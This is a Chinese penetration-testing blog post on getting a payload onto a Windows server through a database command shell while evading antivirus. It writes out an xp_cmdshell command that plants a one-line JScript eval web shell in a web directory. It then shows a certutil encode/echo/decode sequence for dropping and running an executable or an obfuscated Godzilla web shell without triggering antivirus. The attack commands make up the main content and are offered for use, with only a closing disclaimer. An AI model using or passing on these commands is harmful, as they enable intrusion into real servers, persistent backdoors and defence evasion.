0x01 前言

各位在渗透中是否遇见过这个问题:

虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。

本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的操作。

0x02 正文

话不多说,例如这样场景:在数据库连接后或者sqlmap注入连接os-shell后可执行命令。

微信图片_20230220182218

其中包括杀软或某狗、某盾

微信图片_20230220182247

此时下载文件的各种命令均被拦截

bitsadmin:

微信图片_20230220182319

certutil证书:

微信图片_20230220182508

还会被杀软报警

微信图片_20230220182546

powershell也会被彻底封杀

微信图片_20230220182614

尤其是某管家,拦截更彻底,根本没有倒计时自动消失(此时需要夸一下某大厂的报警提示倒计时功能)

微信图片_20230220182637

而在这种环境下可在有权限写入的前提下尝试写入一句话木马

xp_cmdshell 'echo  ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["bmfx"], "unsafe");%^>> D:\\WWW\\bmfx.aspx'

但也存在被某狗、WAF杀掉的可能,此时,骚操作上场

windows自带的证书下载,也就是上文使用但远程下载被拦截的Certutil,还可用来对文件编码解码

本地:
Certutil -encode artifact.exe artifact.txt

或指定路径:
Certutil -encode d:\artifact.exe d:\artifact.txt

微信图片_20230220182838

将txt文本使用echo命令

echo sfAFASFAsfasgasdf………>>d:\1.txt

写入服务器后,进入txt所在目录执行解码(或直接指定物理目录文件)

Certutil -decode art.txt art.exe
或:
Certutil -decode d:\art.txt d:\art.exe

微信图片_20230220183047

后续可在命令中执行exe上线

cmd.exe /c art.exe

重点是: 本地解码编码操作不会触发杀软拦截行为!

此外,Certutil支持将任意文件编码解码,除了exe还有aspx、php、jsp等(如加密免杀的webshell,此处使用哥斯拉为例)

微信图片_20230220183155

可在web站点写入文件后访问txt查看写入有无偏差

微信图片_20230220183257

还有一点,本人亲测,编码后txt中的文本类似于生成的shellcode,会自动换行显示,但本地替换换行符、自行拆分换行符,不改变内容的前提下,编码、解码前后的文件不会有任何影响。

但是在navicat等数据库软件里操作的话还有一个限制,echo的长度会提示不要过长

微信图片_20230220183328-1676889252830

但是在navicat等数据库软件里操作的话还有一个限制,echo的长度会提示不要过长

免责声明: 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测。